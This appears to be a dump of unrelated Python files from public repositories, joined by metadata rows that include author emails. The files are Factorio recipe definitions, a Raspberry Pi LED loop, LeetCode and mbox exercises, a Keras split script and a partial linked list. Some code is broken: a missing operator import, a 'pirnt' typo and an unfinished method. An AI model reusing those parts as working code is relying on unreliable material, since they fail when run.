ProductInput(iron_plate, 5, 2),
ProductInput(steel_plate, -1, 1),
],
8.772,
180,
has_site=True,
building=electric_furnace,
)
produce_lubricant = Process(
"lubricant",
[
ProductInput(heavy_oil, 10, 1),
ProductInput(lubricant, -10),
],
1,
has_site=True,
building=chemical_plant,
)
produce_sulfuric_acid = Process(
"sulfuric acid",
[
ProductInput(iron_plate, 1, 1),
ProductInput(sulfur, 5, 1),
ProductInput(sulfuric_acid, -50),
],
1,
has_site=True,
building=chemical_plant,
)
produce_electronic_circuit = Process("electronic circuit",
[
ProductInput(iron_plate, 1, 1),
ProductInput(copper_cable, 3, 2),
ProductInput(electronic_circuit, -1, 1),
],
0.5,
has_site=True,
building=assembling_machine_3,
)
produce_advanced_circuit = Process(
"advanced circuit",
[
ProductInput(copper_cable, 4, 1),
ProductInput(electronic_circuit, 2, 0.5),
ProductInput(plastic_bar, 2, 0.5),
ProductInput(advanced_circuit, -1, 1),
],
6,
has_site=True,
building=assembling_machine_3,
)
produce_processing_unit = Process("processing unit",
[
ProductInput(electronic_circuit, 20, 2),
ProductInput(advanced_circuit, 2, 1),
ProductInput(sulfuric_acid, 5),
ProductInput(processing_unit, -1, 1),
],
10,
has_site=True,
building=assembling_machine_3,
)
produce_speed_module_1 = Process("speed module 1",
[
ProductInput(electronic_circuit, 5.0),
ProductInput(advanced_circuit, 5.0),
ProductInput(speed_module_1, -1, 1),
],
15,
has_site=True,
building=assembling_machine_3,
)
produce_speed_module_2 = Process(
"speed module 2",
[
ProductInput(advanced_circuit, 5.0),
ProductInput(processing_unit, 5.0),
ProductInput(speed_module_1, 4.0),
ProductInput(speed_module_2, -1, 1),
],
30,
building=assembling_machine_3,
)
produce_speed_module_3 = Process("speed module 3",
[
ProductInput(advanced_circuit, 5.0),
ProductInput(processing_unit, 5.0),
ProductInput(speed_module_2, 5.0),
ProductInput(speed_module_3, -1, 1),
],
60,
building=assembling_machine_3,
)
produce_battery = Process("battery",
[
ProductInput(iron_plate, 1, 1),
ProductInput(copper_plate, 1, 1),
ProductInput(sulfuric_acid, 20),
ProductInput(battery, -1, 1)
],
5,
has_site=True,
building=chemical_plant,
)
produce_accumulator = Process("accumulator",
[
ProductInput(iron_plate, 2, 1),
ProductInput(battery, 5, 2),
ProductInput(accumulator, -1, 1),
],
10,
has_site=True,
building=assembling_machine_3,
)
produce_low_density_structure = Process("low_density_structure",
[
ProductInput(copper_plate, 5, 1),
ProductInput(plastic_bar, 5, 1),
ProductInput(steel_plate, 10, 1),
ProductInput(low_density_structure, -1, 1),
],
30,
has_site=True,
building=assembling_machine_3,
)
produce_iron_gear_wheel = Process(
"iron_gear_wheel",
[
ProductInput(iron_plate, 2, 2),
ProductInput(iron_gear_wheel, -1, 1),
],
0.5,
has_site=True,
building=assembling_machine_3,
)
produce_radar = Process("radar",
[
ProductInput(electronic_circuit, 5),
ProductInput(iron_gear_wheel, 5),
ProductInput(iron_plate, 10),
ProductInput(radar, -1, 1),
],
0.5,
building=assembling_machine_3,
)
heavy_oil_to_solid_fuel = Process(
"heavy oil to solid fuel",
[
ProductInput(heavy_oil, 20),
ProductInput(solid_fuel, -1, 1),
],
3,
building=chemical_plant,
)
light_oil_to_solid_fuel = Process(
"light oil to solid fuel",
[
ProductInput(light_oil, 10),
ProductInput(solid_fuel, -1, 1),
],
3,
building=chemical_plant,
)
produce_chemical_plant = Process(
"chemical plant",
[
ProductInput(electronic_circuit, 5, 1),
ProductInput(iron_gear_wheel, 5, 1),
ProductInput(pipe, 5, 1),
ProductInput(steel_plate, 5, 1),
ProductInput(chemical_plant, -1, 1),
],
5,
210,
building=assembling_machine_3,
)
produce_rocket_fuel = Process(
"rocket_fuel",
[
ProductInput(solid_fuel, 10, 2),
ProductInput(rocket_fuel, -1, 1),
],
30,
has_site=True,
building=assembling_machine_3,
)
produce_solar_panel = Process("solar_panel",
[
ProductInput(copper_plate, 5),
ProductInput(electronic_circuit, 15),
ProductInput(steel_plate, 5),
ProductInput(solar_panel, -1, 1),
],
10,
building=assembling_machine_3,
)
produce_satellite = Process(
"satellite",
[
ProductInput(accumulator, 100),
ProductInput(low_density_structure, 100),
ProductInput(processing_unit, 100),
ProductInput(radar, 5),
ProductInput(rocket_fuel, 50),
ProductInput(solar_panel, 100),
ProductInput(satellite, -1, 1),
],
5,
building=assembling_machine_3,
)
produce_rocket_control_unit = Process(
"rocket control unit",
[
ProductInput(processing_unit, 1),
ProductInput(speed_module_1, 1),
ProductInput(rocket_control_unit, -1, 1),
],
30,
building=assembling_machine_3,
)
produce_rocket_part = Process("rocket_part",
[
ProductInput(low_density_structure, 10),
ProductInput(rocket_control_unit, 10),
ProductInput(rocket_fuel, 10),
ProductInput(rocket_part, -1),
],
3,
4000,
building=rocket_silo,
)
produce_satellite_launch = Process(
"satellite_launch",
[
ProductInput(rocket_part, 100),
ProductInput(satellite, 1),
#ProductInput(satellite_launch, -1, 1),
ProductInput(space_science_pack, -1000, 1),
],
0,
has_site=True,
)
produce_inserter = Process("inserter",
[
ProductInput(electronic_circuit, 1, 1),
ProductInput(iron_gear_wheel, 1, 1),
ProductInput(iron_plate, 1, 1),
ProductInput(inserter, -1, 1),
],
0.5,
has_site=True,
building=assembling_machine_3,
)
produce_fast_inserter = Process("fast inserter",
[
ProductInput(electronic_circuit, 2, 1),
ProductInput(inserter, 1, 1),
ProductInput(iron_plate, 2, 1),
ProductInput(fast_inserter, -1, 1),
],
0.5,
has_site=True,
)
produce_stack_inserter = Process("stack inserter",
[
ProductInput(advanced_circuit, 1, 1),
ProductInput(electronic_circuit, 15, 1),
ProductInput(fast_inserter, 1, 1),
ProductInput(iron_gear_wheel, 15, 1),
ProductInput(stack_inserter, -1, 1),
],
0.5,
has_site=True,
)
produce_stack_filter_inserter = Process(
"stack filter inserter",
[
ProductInput(electronic_circuit, 5, 1),
ProductInput(stack_inserter, 1, 1),
ProductInput(stack_filter_inserter, -1, 1),
],
0.5,
has_site=True,
)
produce_transport_belt = Process(
"transport_belt",
[
ProductInput(iron_gear_wheel, 1, 1),
ProductInput(iron_plate, 1, 1),
ProductInput(transport_belt, -1, 1),
],
0.5,
has_site=True,
building=assembling_machine_3,
)
produce_fast_transport_belt = Process(
"fast transport belt",
[
ProductInput(iron_gear_wheel, 5, 1),
ProductInput(transport_belt, 1, 1),
ProductInput(fast_transport_belt, -1, 1),
],
0.5,
)
produce_express_transport_belt = Process(
"express transport belt",
[
ProductInput(fast_transport_belt, 1, 1),
ProductInput(iron_gear_wheel, 10, 1),
ProductInput(lubricant, 20),
ProductInput(express_transport_belt, -1, 1),
],
0.5,
)
produce_electric_furnace = Process(
"electric furnace",
[
ProductInput(advanced_circuit, 5, 1),
ProductInput(steel_plate, 10, 1),
ProductInput(stone_brick, 10, 1),
ProductInput(electric_furnace, -1, 1),
],
5,
has_site=True,
building=assembling_machine_3,
)
produce_electric_mining_drill = Process(
"electric mining drill",
[
ProductInput(electronic_circuit, 3, 0.5),
ProductInput(iron_gear_wheel, 5, 0.5),
ProductInput(iron_plate, 10, 0.5),
ProductInput(electric_mining_drill, -1, 1),
],
2,
has_site=True,
building=assembling_machine_3,
)
produce_science_pack_1 = Process("science pack 1",
[
ProductInput(copper_plate, 1, 0.5),
ProductInput(iron_gear_wheel, 1, 0.5),
ProductInput(science_pack_1, -1, 1),
],
5,
has_site=True,
building=assembling_machine_3,
)
produce_science_pack_2 = Process("science pack 2",
[
ProductInput(inserter, 1, 0.5),
ProductInput(transport_belt, 1, 0.5),
ProductInput(science_pack_2, -1, 1),
],
6,
has_site=True,
building=assembling_machine_3,
)
produce_science_pack_3 = Process(
"science pack 3",
[
ProductInput(advanced_circuit, 1, 0.5),
ProductInput(electric_mining_drill, 1, 0.5),
ProductInput(engine_unit, 1, 0.5),
ProductInput(science_pack_3, -1, 1),
],
12,
has_site=True,
building=assembling_machine_3,
)
produce_military_science_pack = Process(
"military science pack",
[
ProductInput(grenade, 1, 1),
ProductInput(gun_turret, 1, 1),
ProductInput(piercing_rounds_magazine, 1, 1),
ProductInput(military_science_pack, -2, 1),
],
10,
has_site=True,
building=assembling_machine_3,
)
produce_production_science_pack = Process(
"production science pack",
[
ProductInput(electric_engine_unit, 1, 1),
ProductInput(electric_furnace, 1, 1),
ProductInput(production_science_pack, -2, 1),
],
14,
has_site=True,
building=assembling_machine_3,
)
produce_high_tech_science_pack = Process(
"high tech science pack",
[
ProductInput(battery, 1, 1),
ProductInput(copper_cable, 30, 1),
ProductInput(processing_unit, 3, 1),
ProductInput(speed_module_1, 1, 1),
ProductInput(high_tech_science_pack, -2, 1),
],
14,
has_site=True,
building=assembling_machine_3,
)
produce_firearm_magazine = Process(
"firearm magazine",
[
ProductInput(iron_plate, 4, 1),
ProductInput(firearm_magazine, -1, 1),
],
1,
has_site=True,
)
produce_piercing_rounds_magazine = Process(
"piercing rounds magazine",
[
ProductInput(copper_plate, 5, 1),
ProductInput(firearm_magazine, 1, 1),
ProductInput(steel_plate, 1, 1),
ProductInput(piercing_rounds_magazine, -1, 1),
],
3,
has_site=True,
)
produce_defender_capsule = Process(
"defender capsule",
[
ProductInput(electronic_circuit, 2, 1),
ProductInput(iron_gear_wheel, 3, 1),
ProductInput(piercing_rounds_magazine, 1, 1),
ProductInput(defender_capsule, -1, 1),
],
8,
)
produce_distractor_capsule = Process(
"distractor capsule",
[
ProductInput(advanced_circuit, 3, 1),
ProductInput(defender_capsule, 4, 1),
ProductInput(distractor_capsule, -1, 1),
],
15,
)
produce_destroyer_capsule = Process(
"destroyer capsule",
[
ProductInput(distractor_capsule, 4, 1),
ProductInput(speed_module_1, 1, 1),
ProductInput(destroyer_capsule, -1, 1),
],
15,
)
solar_power = Process(
"solar power",
[
ProductInput(electrical_energy, -42),
],
1,
)
#includes 300% neighbor bonus
nuclear_power = Process(
"nuclear power",
[
ProductInput(uranium_fuel_cell, 1),
ProductInput(heat_energy, -8000000 * 4),
],
200,
building=nuclear_reactor
)
heat_exchanger_process = Process(
"heat exchanger process",
[
ProductInput(heat_energy, 10000),
ProductInput(steam_500, -10000 / 97),
],
1,
)
steam_turbine_process = Process(
"steam turbine process",
[
ProductInput(steam_500, 60),
ProductInput(electrical_energy, -60 * steam_500.energy),
],
1,
building=steam_turbine
)
research = Process(
"research",
[
ProductInput(science_pack_1, 1),
ProductInput(science_pack_2, 1),
ProductInput(science_pack_3, 1),
ProductInput(military_science_pack, 1),
ProductInput(production_science_pack, 1),
ProductInput(high_tech_science_pack, 1),
ProductInput(space_science_pack, 1),
ProductInput(research_phantom, -1),
],
1,
has_site=True,
building=lab,
)
produce_engine_unit = Process(
"engine unit",
[
ProductInput(iron_gear_wheel, 1, 0.5),
ProductInput(pipe, 2, 0.5),
ProductInput(steel_plate, 1, 0.5),
ProductInput(engine_unit, -1, 1),
],
10,
has_site=True,
building=assembling_machine_3,
)
produce_electric_engine_unit = Process(
"electric engine unit",
[
ProductInput(electronic_circuit, 2, 1),
ProductInput(engine_unit, 1, 1),
ProductInput(lubricant, 15),
ProductInput(electric_engine_unit, -1, 1),
],
10,
has_site=True,
building=assembling_machine_3,
)
produce_pipe = Process(
"pipe",
[
ProductInput(iron_plate, 1, 1),
ProductInput(pipe, -1, 1),
],
0.5,
has_site=True,
)
produce_explosives = Process(
"explosives",
[
ProductInput(coal, 1, 1),
ProductInput(sulfur, 1, 1),
ProductInput(water, 10, 1),
ProductInput(explosives, -1, 1),
],
5,
)
produce_explosive_cannon_shell = Process(
"explosive_cannon_shell",
[
ProductInput(explosives, 2, 1),
ProductInput(plastic_bar, 2, 1),
ProductInput(steel_plate, 2, 1),
ProductInput(explosive_cannon_shell, -1, 1),
],
8,
)
produce_artillery_shell = Process(
"artillery_shell",
[
ProductInput(explosive_cannon_shell, 4, 1),
ProductInput(explosives, 8, 1),
ProductInput(radar, 1, 1),
ProductInput(artillery_shell, -1, 1),
],
15,
)
produce_gun_turret = Process(
"gun turret",
[
ProductInput(copper_plate, 10, 1),
ProductInput(iron_gear_wheel, 10, 1),
ProductInput(iron_plate, 20, 1),
ProductInput(gun_turret, -1, 1),
],
8,
has_site=True,
building=assembling_machine_3,
)
produce_rail = Process(
"rail",
[
ProductInput(iron_stick, 1, 1),
ProductInput(steel_plate, 1, 1),
ProductInput(stone, 1, 1),
ProductInput(rail, -2, 1),
],
0.5,
)
produce_iron_stick = Process(
"iron stick",
[
ProductInput(iron_plate, 1, 1),
ProductInput(iron_stick, -2, 1),
],
0.5,
)
produce_grenade = Process(
"grenade",
[
ProductInput(coal, 10, 1),
ProductInput(iron_plate, 5, 1),
ProductInput(grenade, -1, 1),
],
8,
has_site=True,
building=assembling_machine_3,
)
produce_nuclear_reactor = Process(
"nuclear reactor",
[
ProductInput(advanced_circuit, 500),
ProductInput(concrete, 500),
ProductInput(copper_plate, 500),
ProductInput(steel_plate, 500),
ProductInput(nuclear_reactor, -1),
],
3,
)
produce_concrete = Process(
"concrete",
[
ProductInput(iron_ore, 1),
ProductInput(stone_brick, 5),
ProductInput(water, 100),
ProductInput(concrete, -10),
],
10,
)
produce_heat_exchanger = Process(
"heat exchanger",
[
ProductInput(copper_plate, 100),
ProductInput(pipe, 10),
ProductInput(steel_plate, 10),
ProductInput(heat_exchanger, -1),
],
3,
)
produce_steam_turbine = Process(
"steam turbine",
[
ProductInput(copper_plate, 50),
ProductInput(iron_gear_wheel, 50),
ProductInput(pipe, 20),
ProductInput(steam_turbine, -1),
],
3,
)
produce_assembling_machine_1 = Process(
"assembling machine 1",
[
ProductInput(electronic_circuit, 3),
ProductInput(iron_gear_wheel, 5),
ProductInput(iron_plate, 9),
ProductInput(assembling_machine_1, -1),
],
0.5,
building=assembling_machine_3
)
produce_assembling_machine_2 = Process(
"assembling machine 2",
[
ProductInput(assembling_machine_1, 1),
ProductInput(electronic_circuit, 3),
ProductInput(iron_gear_wheel, 5),
ProductInput(iron_plate, 9),
ProductInput(assembling_machine_2, -1),
],
0.5,
building=assembling_machine_3
)
produce_assembling_machine_3 = Process(
"assembling machine 3",
[
ProductInput(assembling_machine_2, 2),
ProductInput(speed_module_1, 4),
ProductInput(assembling_machine_3, -1),
],
0.5,
building=assembling_machine_3
)
produce_rail_signal = Process(
"rail signal",
[
ProductInput(electronic_circuit, 1),
ProductInput(iron_plate, 5),
ProductInput(rail_signal, -1),
],
0.5,
building=assembling_machine_3
)
produce_rail_chain_signal = Process(
"rail chain signal",
[
ProductInput(electronic_circuit, 1),
ProductInput(iron_plate, 5),
ProductInput(rail_chain_signal, -1),
],
0.5,
building=assembling_machine_3
)
produce_rocket_silo = Process(
"rocket silo",
[
ProductInput(concrete, 1000),
ProductInput(electric_engine_unit, 200),
ProductInput(pipe, 100),
ProductInput(processing_unit, 200),
ProductInput(steel_plate, 1000),
ProductInput(rocket_silo, -1),
],
30,
building=assembling_machine_3,
)
produce_oil_refinery = Process(
"oil refinery",
[
ProductInput(electronic_circuit, 10),
ProductInput(iron_gear_wheel, 10),
ProductInput(pipe, 10),
ProductInput(steel_plate, 15),
ProductInput(stone_brick, 10),
ProductInput(oil_refinery, -1),
],
8,
)
produce_lab = Process(
"lab",
[
ProductInput(electronic_circuit, 10),
ProductInput(iron_gear_wheel, 10),
ProductInput(transport_belt, 4),
ProductInput(lab, -1),
],
2,
)
produce_new_base_supplies = Process(
"new base supplies",
[
ProductInput(stack_filter_inserter, 48),
ProductInput(express_transport_belt, 200),
ProductInput(rail, 100),
ProductInput(rail_signal, 20),
ProductInput(rail_chain_signal, 20),
ProductInput(new_base_supplies, -1),
],
0,
)
production = Process("production",
[
ProductInput(speed_module_3, 1 / 3),
ProductInput(speed_module_3, 1 / 3),
ProductInput(speed_module_3, 1 / 3),
ProductInput(satellite_launch, 1),
ProductInput(destroyer_capsule, 1 / 1),
ProductInput(piercing_rounds_magazine, 1 / 1),
ProductInput(science_pack_1, 10),
ProductInput(science_pack_2, 10),
ProductInput(science_pack_3, 10),
ProductInput(military_science_pack, 10),
ProductInput(production_science_pack, 10),
ProductInput(high_tech_science_pack, 10),
ProductInput(space_science_pack, 10),
ProductInput(new_base_supplies, 1 / 30),
ProductInput(artillery_shell, 10),
],
60,
)
#x.process_default = produce_x
#x.process_default = produce_x
#x.process_default = produce_x
#x.process_default = produce_x
research_phantom.process_default = research
pumpjack.process_default = produce_pumpjack
lab.process_default = produce_lab
oil_refinery.process_default = produce_oil_refinery
rocket_silo.process_default = produce_rocket_silo
rail_signal.process_default = produce_rail_signal
rail_chain_signal.process_default = produce_rail_chain_signal
assembling_machine_1.process_default = produce_assembling_machine_1
assembling_machine_2.process_default = produce_assembling_machine_2
assembling_machine_3.process_default = produce_assembling_machine_3
concrete.process_default = produce_concrete
nuclear_reactor.process_default = produce_nuclear_reactor
heat_exchanger.process_default = produce_heat_exchanger
steam_turbine.process_default = produce_steam_turbine
heat_energy.process_default = nuclear_power
steam_500.process_default = heat_exchanger_process
uranium_235.process_default = uranium_enrichment
uranium_238.process_default = uranium_processing
uranium_ore.process_default = mine_uranium_ore
uranium_fuel_cell.process_default = produce_uranium_fuel_cell
space_science_pack.process_default = produce_satellite_launch
high_tech_science_pack.process_default = produce_high_tech_science_pack
stone_brick.process_default = produce_stone_brick
production_science_pack.process_default = produce_production_science_pack
gun_turret.process_default = produce_gun_turret
grenade.process_default = produce_grenade
electric_furnace.process_default = produce_electric_furnace
electric_engine_unit.process_default = produce_electric_engine_unit
military_science_pack.process_default = produce_military_science_pack
iron_stick.process_default = produce_iron_stick
rail.process_default = produce_rail
lubricant.process_default = produce_lubricant
fast_transport_belt.process_default = produce_fast_transport_belt
express_transport_belt.process_default = produce_express_transport_belt
stone.process_default = mine_stone
explosives.process_default = produce_explosives
explosive_cannon_shell.process_default = produce_explosive_cannon_shell
artillery_shell.process_default = produce_artillery_shell
new_base_supplies.process_default = produce_new_base_supplies
pipe.process_default = produce_pipe
engine_unit.process_default = produce_engine_unit
firearm_magazine.process_default = produce_firearm_magazine
piercing_rounds_magazine.process_default = produce_piercing_rounds_magazine
defender_capsule.process_default = produce_defender_capsule
distractor_capsule.process_default = produce_distractor_capsule
destroyer_capsule.process_default = produce_destroyer_capsule
rocket_control_unit.process_default = produce_rocket_control_unit
rocket_part.process_default = produce_rocket_part
satellite_launch.process_default = produce_satellite_launch
speed_module_1.process_default = produce_speed_module_1
speed_module_2.process_default = produce_speed_module_2
speed_module_3.process_default = produce_speed_module_3
electric_mining_drill.process_default = produce_electric_mining_drill
transport_belt.process_default = produce_transport_belt
science_pack_1.process_default = produce_science_pack_1
science_pack_2.process_default = produce_science_pack_2
science_pack_3.process_default = produce_science_pack_3
inserter.process_default = produce_inserter
fast_inserter.process_default = produce_fast_inserter
stack_inserter.process_default = produce_stack_inserter
stack_filter_inserter.process_default = produce_stack_filter_inserter
solar_panel.process_default = produce_solar_panel
rocket_fuel.process_default = produce_rocket_fuel
iron_gear_wheel.process_default = produce_iron_gear_wheel
radar.process_default = produce_radar
advanced_circuit.process_default = produce_advanced_circuit
copper_cable.process_default = produce_copper_cable
electronic_circuit.process_default = produce_electronic_circuit
processing_unit.process_default = produce_processing_unit
steel_plate.process_default = produce_steel_plate
coal.process_default = mine_coal
plastic_bar.process_default = produce_plastic_bar
low_density_structure.process_default = produce_low_density_structure
electrical_energy.process_default = steam_turbine_process
water.process_default = mine_water
crude_oil.process_default = mine_crude_oil
petroleum.process_default = advanced_oil_processing
sulfur.process_default = produce_sulfur
sulfuric_acid.process_default = produce_sulfuric_acid
battery.process_default = produce_battery
iron_ore.process_default = mine_iron_ore
iron_plate.process_default = produce_iron_plate
copper_ore.process_default = mine_copper_ore
copper_plate.process_default = produce_copper_plate
accumulator.process_default = produce_accumulator
satellite.process_default = produce_satellite
solid_fuel.process_default = light_oil_to_solid_fuel
light_oil.process_default = advanced_oil_processing
heavy_oil.process_default = advanced_oil_processing
chemical_plant.process_default = produce_chemical_plant
| [
"charles.rymal@nortek.com"
] | charles.rymal@nortek.com |
0e3488ef3a1d4b32b2ad0716ed23d7df856f9fe8 | 9db1b68112c9fd0f4f8a84bd7a57f80eef4dc2ed | /rasppi/led_ex.py | 04c8199b9cfbc59e30b60ff91076c82281f58192 | [] | no_license | mangoJakeShin/bit_academy | 464bc9cfb71ec03ad368b7d6e6a0f837f75ce9bf | d59508b6dc373301fd3abdd53ebe622520fd3982 | refs/heads/main | 2023-02-17T03:17:29.025738 | 2021-01-19T01:29:51 | 2021-01-19T01:29:51 | 303,314,532 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.OUT)
GPIO.setup(6, GPIO.OUT)
GPIO.setup(26, GPIO.OUT)
def GPon(a,b):
GPIO.output(a,True)
time.sleep(b)
def GPoff(a,b):
GPIO.output(a,False)
time.sleep(b)
def GPctrl(gpnum,on,off):
GPon(gpnum,on)
GPoff(gpnum,off)
while(True):
GPctrl(17, 1, 0.2)
GPctrl(6, 1, 1)
GPctrl(26, 1, 1)
| [
"yellowman2@naver.com"
] | yellowman2@naver.com |
ff5481487e54507a28f7f346fc73b088e009771b | fcc88521f63a3c22c81a9242ae3b203f2ea888fd | /Python3/0006-ZigZag-Conversion/soln.py | f2d94cda1de538a16f8a63dbbbb03073bd1a954e | [
"MIT"
] | permissive | wyaadarsh/LeetCode-Solutions | b5963e3427aa547d485d3a2cb24e6cedc72804fd | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | refs/heads/master | 2022-12-06T15:50:37.930987 | 2020-08-30T15:49:27 | 2020-08-30T15:49:27 | 291,811,790 | 0 | 1 | MIT | 2020-08-31T19:57:35 | 2020-08-31T19:57:34 | null | UTF-8 | Python | false | false | 510 | py | import functools
class Solution:
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
if numRows == 1 or len(s) <= numRows:
return s
rows = [[] for _ in range(numRows)]
row, drow = 0, 1
for ch in s:
rows[row].append(ch)
row += drow
if row == 0 or row == numRows - 1:
drow = -drow
return ''.join(functools.reduce(operator.add, rows)) | [
"zhang623@wisc.edu"
] | zhang623@wisc.edu |
1e7b2594ee76d52af756fe706e37e3af5004a494 | bdac572800f7ca27d7be2ea84cbf3c58bbb8ad7c | /Math/PerfectNumber.py | 4803f96773414f1b28373a6599bd63ea7fb21955 | [] | no_license | msbvarma/CrackingTheCodingInterview | a5159ce960f3bc265624ef9f505422c73c99c794 | 930d2aea755dec58262ca8d66aa1f6d63569ff87 | refs/heads/master | 2022-01-31T02:26:15.743289 | 2022-01-27T01:18:58 | 2022-01-27T01:18:58 | 137,708,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 563 | py | # number is perfect or not
# Returns true if n is perfect
def isPerfect( n ):
# To store sum of divisors
sum = 1
# Find all divisors and add them
i = 2
while i * i <= n:
if n % i == 0:
sum = sum + i + n/i
i += 1
# If sum of divisors is equal to
# n, then n is a perfect number
return (True if sum == n and n!=1 else False)
# Driver program
print("Below are all perfect numbers till 10000")
n = 2
for n in range (10000):
if isPerfect (n):
print(n , " is a perfect number")
| [
"msbvarma@users.noreply.github.com"
] | msbvarma@users.noreply.github.com |
6017ee3e478f57134bab5e1b99b78ac9eb3899be | 38d8daf256c1529458e10c3eb3869bc384de6e4a | /10.2.py | 6a2ae4dc4a690d6ddd3285b18d5b092667992a13 | [] | no_license | amandaabalos/mbox-short | 5a8c75dc35d3711efee57319604366cb0f7f1cbe | 1bd59755427743681cd598af9d756458ff877e8b | refs/heads/master | 2021-08-19T08:59:52.153413 | 2020-09-02T19:53:13 | 2020-09-02T19:53:13 | 218,678,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | fhand=open('mbox-short.txt')
newlist=list()
for line in fhand:
line=line.rstrip()
if 'From ' in line:
words=line.split()
#print(words)
ind=words[5]
hr=ind.split(':')
#print(hr[0])
#count=count+1
#print(ind)
newlist.append(hr[0])
#print(newlist)
counts = dict()
for line in newlist:
words=line.split()
#print(words)
for word in words:
counts[word]=counts.get(word, 0)+1
#print(counts)
#counts.items()
count=counts.items()
sort=sorted(count)
#print(sort)
for k,v in sort:
print(k,v)
#for i in sort:
# lst.append(i)
# print(lst)
# word=lst[0,2]
# print(word)
#for hr in ind:
# wd=ind.split(':')
# print(wd[0])
# index=wd[0]
# #print(ind)
# count=count+1
# newlist.append(index)
#print(newlist)
| [
"noreply@github.com"
] | amandaabalos.noreply@github.com |
5363f8ba50ad1f40740df80389c67d2c9e4ba339 | 13befacd26854ae85b640755ac49c935378cb55e | /keras12_split.py | fecb247fda0dc45f50c2a0ef77a4e4d88b2db5f6 | [] | no_license | sunho-park/bitcamp | 4ed7102aa2443223e3e44f39a51a63db9236e153 | b3c1568d893b1f52ac8e9d2146c426d0d27e3124 | refs/heads/master | 2022-07-12T18:30:59.936394 | 2020-05-14T10:20:53 | 2020-05-14T10:20:53 | 263,186,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,888 | py |
#1. 데이터
import numpy as np
x=np.array(range(1, 101))
y=np.array(range(101, 201))
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=66, test_size=0.3)
#x, y, random_state=99, shufle=True, test_size=0.4
x_val, x_test, y_val, y_test = train_test_split(x_test, y_test, random_state=66, test_size=0.66)
#x_test, y_test, random_state=99, test_size=0.5
# x_train = x[:60] #0~59
# x_val = x[60:80] #60~79
# x_test = x[80:] #80~66
# y_train = x[:60]
# y_val = x[60:80]
# y_test = x[80:]
print("x_train = ", x_train)
# print("y_train = ", y_train)
print("x_test = ", x_test)
print("x_val = ", x_val)
# print("y_val = ", y_val)
# print("y_test = ", y_test)
'''
# 2. 모델구성
from keras.models import Sequential
from keras.layers import Dense
# Sequential 함수를 model 로 하겠다.
model = Sequential()
model.add(Dense(5, input_dim=1)) #1~100의 한 덩어리?
model.add(Dense(10))
model.add(Dense(10))
model.add(Dense(10))
model.add(Dense(10))
model.add(Dense(1))
# 3. 훈련
model.compile(loss='mse', optimizer='adam', metrics=['mse'])
model.fit(x_train, y_train, epochs=100, batch_size=1, validation_data = (x_val, y_val)) #훈련용 데이터로 훈련
# 4. 평가, 예측
loss, mse = model.evaluate(x_test, y_test, batch_size=1) #훈련용 데이터와 평가용 데이터를 분리해야함
print("loss : ", loss)
print("mse = ", mse)
y_predict = model.predict(x_test)
print("y_predict : \n", y_predict)
from sklearn.metrics import mean_squared_error
def RMSE(y_test, y_predict):
return np.sqrt(mean_squared_error(y_test, y_predict))
print("RMSE : ", RMSE(y_test, y_predict))
# R2 구하기
from sklearn.metrics import r2_score
r2 = r2_score(y_test, y_predict)
print("r2 : ", r2) #회귀모형''' | [
"noreply@github.com"
] | sunho-park.noreply@github.com |
4b0f1007791423a5089472301bb2d177f4c91298 | b19ea34b8794406e23625d95c2cb64db4b792e8e | /ca_camera/urls.py | ef142cdf207c490ca363921dc0654090b5e8de1b | [] | no_license | yabu4696/dep-django | b9a398cae47528d8e30d2d70943a13fdcf42e234 | 4dfc866773fe45fb4de647eea90aba4e3cb86c07 | refs/heads/main | 2023-04-01T00:23:32.782654 | 2021-03-16T05:31:49 | 2021-03-16T05:31:49 | 343,222,493 | 0 | 0 | null | 2021-03-04T21:07:56 | 2021-02-28T21:49:32 | Python | UTF-8 | Python | false | false | 908 | py | from django.urls import path
from . import views
app_name = 'ca_camera'
urlpatterns = [
# path('rayout',views.rayout,name='rayout'),
path('', views.index, name='index'),
path('item/<slug:slug>', views.detail, name='detail'),
# path('form', views.form, name='form'),
path('delete', views.delete, name='delete'),
# path('reload/',views.reload, name='reload'),
# path('item/<slug:slug>/edit', views.edit,name='edit'),
path('item/<slug:slug>/exclusion', views.exclusion, name='exclusion'),
# path('item/<slug:slug>/reload_one', views.reload_one, name='reload_one'),
path('maker_index',views.maker_index, name='maker_index'),
path('maker/<slug:slug>', views.maker_detail, name='maker_detail'),
# path('celery_test/', views.celery_test, name='celery_test'),
path('contact', views.contact, name='contact'),
path('contact/done', views.done, name='done'),
] | [
"shiroro.96646@gmail.com"
] | shiroro.96646@gmail.com |
8fdad3afb1678adeb07f91d11ed5846b44b35a03 | b67900795d7facd9c1fd0b74f5747a1fa56d9e6d | /split_string.py | c86df46221c9f4530c4436387d6aceae2380ab0c | [] | no_license | pinkrespect/HappyHappyAlgorithm | 438c4b711c87f487bcbf0a6306e3bd9b871c620b | b5d91d0abc7c8a46f89a6cd0d7b97d6244261206 | refs/heads/master | 2020-06-20T19:04:44.979709 | 2019-11-10T09:59:30 | 2019-11-10T09:59:30 | 197,216,870 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | string = input()
for x in range(len(string)):
if x % 10 == 0:
print(string[:10])
string = string[10:]
elif len(string) < 10:
print(string[0:])
break
| [
"pinkrespect@jj.ac.kr"
] | pinkrespect@jj.ac.kr |
2b40b04c096bfb3e64fa6e0f0d91a73aa511b6f5 | 0d7b9ecc3ef7f20d538753adf537797f50e657df | /linkedlist.py | 00be4bbe159a43a535b7d3f62075884964a8ce51 | [] | no_license | tanurag2000/python_playground | 2d1f41fcc17bb2e571514579c2e216767909e6f7 | 7de51ebbfaaec963ee78f04c8db710737a55eb14 | refs/heads/main | 2023-07-27T21:51:04.180669 | 2021-09-16T00:12:49 | 2021-09-16T00:12:49 | 389,365,519 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 749 | py | class Node:
def __init__(self,data):
self.data=data
self.next=None
class linkedlist:
def __init__(self):
self.head=None
def push(self,new_data):
new_node=Node(new_data)
new_node.next=self.head
self.head=new_node
def pushend(self,prev_node,new_data):
if prev_node is None:
pirnt("error")
new_node=Node(new_data)
new_node.next=prev_node.next
